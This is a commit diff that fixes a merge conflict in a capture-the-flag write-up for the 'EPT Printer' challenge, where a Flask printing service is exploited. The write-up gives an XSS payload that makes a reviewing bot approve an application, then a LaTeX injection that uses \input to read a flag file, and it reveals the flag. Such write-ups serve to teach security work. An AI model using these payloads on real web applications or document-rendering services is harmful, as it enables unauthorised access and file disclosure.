Merge pull request #116 from ItsMeBrille/patch-1

Repair after merge conflict 😱
ept-team · Nov 12, 2024 · f6c88c3 · f6c88c3
2 parents c797d79 + bae1fff
commit f6c88c3
Showing 1 changed file with 36 additions and 65 deletions.
diff --git a/writeups/onsite/EPT Printer/FesseMisk/README.md b/writeups/onsite/EPT Printer/FesseMisk/README.md
@@ -1,21 +1,37 @@
-<<<<<<< HEAD
-# Writeup
-author: th@m456 @ FesseMisk
+# EPT Printer
+
+author: th@m456 & Brille @ FesseMisk
+
+
+## Task
 
-## EPT Printer
 ![alt text](image.png)
 
+
+### Initial analysis
+
+EPT Print was a printing service with a Flask backend. Completed documents could be printed on-site.
+
+To use the printer, users needed to be verified first. In addition to the Flask server, a bot ran a headless browser to open and review these applications without approving them.
+
+The printing lets us insert text into a LaTeX template that gets sent to the printer.
+
+
 ### Solution
-This is an onsite challenge where we need to print out the flag on an actual printer. In order to do this, we first need to get approval by a bot reviewing "approval applications".
 
-First, we open the link provided by the EPT Box. 
+This is an onsite challenge where we must print the flag on an actual printer. To do this, we first need to get approval from a bot reviewing "approval applications".
+
+First, we open the link provided by the EPT Box.
+
 ![alt text](image-1.png)
-From here, we must log in with our Discord user. Our Discord user is connected to a personal ID card, which is required for solving the challenge at a later stage.
 
-After logging in, we can find an "approval application" form from the menu in the top right.
+From here, we must log in with our Discord user. Our Discord user is connected to a personal ID card, which is required for solving a later stage of the challenge.
+
+After logging in, we can find an "approval application" form from the menu in the top right:
+
 ![alt text](image-2.png)
 
-By finding hints in the attached source code, I understand that we must trick the bot to automatically click "accept" on our application.
+By finding hints in the attached source code, I understand that we must trick the bot to accept our application automatically.
 
 ```bash
 /webapp/app/templates$ cat application.html
@@ -32,7 +48,7 @@ APPLICATIONS_CHECK_FREQUENCY_SECONDS = int(
     os.getenv("APPLICATIONS_CHECK_FREQUENCY_SECONDS", 30)
 ```
 
-I am able to find out that the application form is susceptible to XSS, by attempting this line:
+I can test to see if the application form is susceptible to XSS, by attempting this line:
 
 ```html
 <script>alert(XSS vulnerable!)</script>>
@@ -46,11 +62,11 @@ We can use XSS to make the bot accept our application upon review with this code
 
 ![alt text](image-3.png)
 
-After waiting for >30 seconds, we are now approved! Now we are able to print stuff by using the `Printing Form`.
+After waiting for >30 seconds, we are now approved! Now we can print stuff by using the `Printing Form`.
 
 ![alt text](image-4.png)
 
-In the source code, we find `template.tex`, indicating that we must write our code in Latex format in order to get the flag. In the template file, we can also see what commands are set, and where our input will be read.
+In the source code, we find `template.tex`, indicating that we must write our code in Latex format to get the flag. In the template file, we can also see what commands are set, and where our input will be read.
 
 ```tex
 $ cat template.tex
@@ -85,71 +101,26 @@ $ cat template.tex
 \end{document}
 ```
 
-The attached source code also has a placeholder for flag.txt, so I know the filepath and name of the flag file is `/webapp/flag.txt`. The printing folder is at `/webapp/app/printing`, so we must do some traversing in our code.
+The attached source code also has a placeholder for flag.txt, so I know the file path and name of the flag file is `/webapp/flag.txt`. The printing folder is at `/webapp/app/printing`, so we must do some traversing in our code.
 
 The printing job is only executed if there are no errors in the Latex code. Many of my attempts gave an error indicating a math expression! So I had to ask GPT;
 
 ```
-In LaTeX, the underscore character _ is a special character used for subscripts in mathematical expressions. Because of this, using an underscore directly in text can cause errors or unexpected behavior. To include an underscore in text, you need to escape it or change its category code.
+In LaTeX, the underscore character _ is a special character used for subscripts in mathematical expressions. Because of this, using an underscore directly in the text can cause errors or unexpected behavior. To include an underscore in text, you need to escape it or change its category code.
 ```
 
-Ahaaaaa! And the flag often contains an underscore!
-
-After several attempts with errors or only printing the filepath, we successfully get the contents of the flag with this code, where we change the category code of underscore (and %, but that probably didn't matter):
+`\input{/flag.txt}` loads the content of `/flag.txt` as LaTeX. But since the flag file most probably just contains the flag, we don't want it to compile as a mmath expression LaTeX. Therefore we use `\catcode`\%=12` and `\catcode`\_=12`. These lines are added so that any `%` and `_` characters are not interpreted as LaTeX until printed. This proved necessary because the flag contained `_` as ChatGPT suggested.
 
 ```latex
 \begingroup
 \catcode`\%=12
 \catcode`\_=12
-\input{../../flag.txt}
+\input{/flag.txt}
 \endgroup
 ```
 
-![alt text](image-5.png)
+<details>
+<summary>Flag</summary>
 
-I forgot to take a picture of the printout... but at least got the flag!
-
-```text
-EPT{Y0U_4R3_4_PR1NT3R_M4ST3R}
-```
-=======
-## EPT PRINTER
-
-### Task
-
-EPT Print was a printing service with a Flask backend. Completed documents could be printed on-site.
-
-To use the printer, users needed to be verified first. In addition to the Flask server, a bot ran a headless browser to open and review these applications without approving them.
-
-The printing lets us insert text into a LaTeX template that gets sent to the printer.
-
-### Solution
-
-First, we need to get approved to use the printer. We can achieve this by injecting XSS. The code actually hints us about it through comments in the source code in `/webapp/app/__init__.py`:
-
-![Comment in code](image.png)
-
-We use XSS to automatically approve our application:
-
-```html
-<img src="x" onerror="document.getElementById('submit').click();">
-```
-
-We are now approved, and we can now use the printer. To get the flag we can exploit the fact that we can write LaTeX in order to read a potential flag file:
-
-```latex
-\begingroup
-\catcode`\%=12
-\catcode`\_=12
-\input{/flag.txt}
-\endgroup
-```
-
-`\input{/flag.txt}` loads he content of `/flag.txt` as LaTeX. But since the flag file most probably just contains the flag, we dont want it to compile as LaTeX. Therefore we use `\catcode`\%=12` and `\catcode`\_=12`. These lines are added so that any `%` and `_` characters are not interpreted as LaTeX until printed. This proved necessary because the flag contained `_`.
-
-<details>
-<summary>Flag</summary>
-
-`EPT{Y0U_4R3_4_PR1NT3R_M4ST3R}`
-</details>
->>>>>>> 35aa7bd3c314268230e8d35c9ff3119545fb950d
+`EPT{Y0U_4R3_4_PR1NT3R_M4ST3R}`
+</details>